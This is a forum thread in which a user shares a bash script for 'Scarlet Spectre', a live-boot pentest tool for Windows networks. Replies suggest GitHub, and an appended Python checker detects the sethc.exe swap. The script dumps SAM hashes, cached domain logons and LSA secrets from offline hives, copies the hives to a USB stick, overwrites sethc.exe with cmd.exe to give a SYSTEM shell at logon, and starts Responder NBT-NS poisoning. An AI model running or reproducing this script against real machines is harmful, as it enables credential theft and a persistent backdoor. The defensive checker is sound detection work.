MateusP

Script for automating pentests on Windows networks.

I am finishing the development of a tool to automate part of a pentest on Windows networks, assuming physical access to a machine for 30 s and the absence of full disk encryption.

The tool is a modified Debian 9 with a fairly silent live boot, with rc.local running the script below.

I would really appreciate constructive criticism, both on the shell script itself and on desirable features! =)

The tool will be released under the GNU/GPLv2 license.

#!/bin/bash
# The -p option of read was not working and I did not have the patience to find out why
exec > /dev/tty1
exec < /dev/tty1
clear
cat /spectre/banner
echo " -----------------------------------"
echo "| Scarlet Spectre Started!          |"
echo " -----------------------------------"
echo "Seeking and mounting NTFS partitions"
mkdir -p /hds/
mkdir -p /hds/pendrive
# The USB stick labelled "Scarlet" is the output location for everything collected
mount -t vfat -o rw,force "$(blkid | grep -i "Scarlet" | cut -d':' -f1)" /hds/pendrive
for device in $(blkid | grep -i "NTFS" | cut -d':' -f1) ; do
	mounted="/hds/$(basename "$device")"
	mkdir -p "$mounted"
	mount -t ntfs-3g -o rw,force "$device" "$mounted"
	if [ -d "$mounted/Windows" ]; then
		echo "Found Windows installed on $device!"
		system32="$mounted/Windows/System32"
		# Dump local account hashes, cached domain logons and LSA secrets from the offline hives
		python /spectre/creddump7/pwdump.py "$system32/config/SYSTEM" "$system32/config/SAM" true | tee -a /hds/pendrive/credentials.log
		python /spectre/creddump7/cachedump.py "$system32/config/SYSTEM" "$system32/config/SECURITY" true | tee -a /hds/pendrive/credentials.log
		python /spectre/creddump7/lsadump.py "$system32/config/SYSTEM" "$system32/config/SECURITY" true | tee -a /hds/pendrive/credentials.log
		echo "Copying registry hives..."
		mkdir -p /hds/pendrive/hives
		cp "$system32"/config/{SYSTEM,SECURITY,SAM,SOFTWARE} /hds/pendrive/hives/
		echo "Do you want to replace sethc.exe with cmd.exe (press shift 5x on logon screen for a prompt as System)? y/N: "
		read -n 1 -s -r temp
		if [ "$temp" == "y" ] || [ "$temp" == "Y" ]; then
			echo -e "\nReplacing sethc.exe..."
			# Keep the original as sethc_.exe, then put cmd.exe in its place
			cp "$system32/sethc.exe" "$system32/sethc_.exe"
			cp "$system32/cmd.exe" "$system32/sethc.exe"
		fi
	fi
done
echo "Do you want to start an NBT-NS poisoning attack? (y/N)"
read -n 1 -s -r temp
if [ "$temp" == "y" ] || [ "$temp" == "Y" ]; then
	echo "Available interfaces:"
	option=0
	interfaces=()
	for interface in /sys/class/net/*; do
		interface="$(basename "$interface")"
		interfaces+=("$interface")
		echo "$option - $interface"
		let "option+=1"
	done
	echo "Enter the number of the network interface you want to configure: "
	read -n 1 -s -r selected
	echo "Trying to setup ${interfaces[$selected]} using DHCP..."
	dhclient "${interfaces[$selected]}"
	# A lease entry naming the interface means DHCP configuration succeeded
	if [ -e /var/lib/dhcp/dhclient.leases ] && grep -q "${interfaces[$selected]}" /var/lib/dhcp/dhclient.leases; then
		python /spectre/Responder/Responder.py -I "${interfaces[$selected]}"
	else
		echo "Unable to setup networking using DHCP, do you want to try to read network setup data from Windows Registry? (y/N): "
		read -n 1 -s -r option
		if [ "$option" == "Y" ] || [ "$option" == "y" ]; then
			echo -e "\nDoing windows registry stuff";  #todo
		fi
	fi
fi

echo "Scarlet Spectre successfully deployed!"
echo "Press R to reboot or anything for a Debian shell"
read -n 1 -s -r tmp
if [ "$tmp" == "r" ] || [ "$tmp" == "R" ]; then
	reboot
fi
clear
exit 0

Edited by MateusP
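A defender's counterpart to the sethc.exe swap in the script above, added here as an example (it is not part of the post or of the Scarlet Spectre project): an offline check that walks a mounted Windows System32 directory, flags logon-screen accessibility helpers that are byte-identical to cmd.exe, and reports the sethc_.exe backup the script leaves behind. The list of helper names beyond sethc.exe and the sample directory the demo builds are assumptions and constructed data.

```python
import hashlib
import tempfile
from pathlib import Path

# Logon-screen accessibility helpers Windows runs as SYSTEM; the names beyond
# sethc.exe are an assumption about which binaries are worth checking.
ACCESSIBILITY_BINARIES = ["sethc.exe", "utilman.exe", "osk.exe",
                          "narrator.exe", "magnify.exe", "displayswitch.exe"]

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def check_accessibility_binaries(system32: Path) -> list:
    """Flag helpers byte-identical to cmd.exe and leftover <name>_.exe backups."""
    cmd = system32 / "cmd.exe"
    if not cmd.is_file():
        return ["cmd.exe missing; cannot compare"]
    cmd_hash = sha256_of(cmd)
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        target = system32 / name
        if not target.is_file():
            continue
        if sha256_of(target) == cmd_hash:
            findings.append(f"{name} is byte-identical to cmd.exe")
        backup = system32 / (target.stem + "_.exe")   # e.g. sethc_.exe
        if backup.is_file():
            findings.append(f"{backup.name} present: original helper kept as a backup")
    return findings

def demo() -> list:
    """Constructed sample: a fake System32 where sethc.exe was overwritten with cmd.exe."""
    with tempfile.TemporaryDirectory() as tmp:
        s32 = Path(tmp) / "Windows" / "System32"
        s32.mkdir(parents=True)
        (s32 / "cmd.exe").write_bytes(b"MZ fake cmd.exe")
        (s32 / "sethc.exe").write_bytes(b"MZ fake cmd.exe")        # swapped
        (s32 / "sethc_.exe").write_bytes(b"MZ fake sethc.exe")     # backup left behind
        (s32 / "utilman.exe").write_bytes(b"MZ fake utilman.exe")  # untouched
        return check_accessibility_binaries(s32)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real system the same comparison can be run against a mounted image or a live System32; a match against cmd.exe on any helper, or a stray `<name>_.exe`, is the artefact to investigate.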

First constructive tip =]. Have you thought about using GitHub? It makes it even easier to receive/give other constructive tips.

cheers =]

On 02/02/2018 at 10:59, ncaio said:

First constructive tip =]. Have you thought about using GitHub? It makes it even easier to receive/give other constructive tips.

cheers =]

Done... it is now on GitHub, complete with a script to build the image from scratch!

I only tested it from a Debian 9 VM, by the way... I will make the ready-made ISO available soon as well...

https://github.com/ScarletTeam/scarlet-spectre/

Edited by MateusP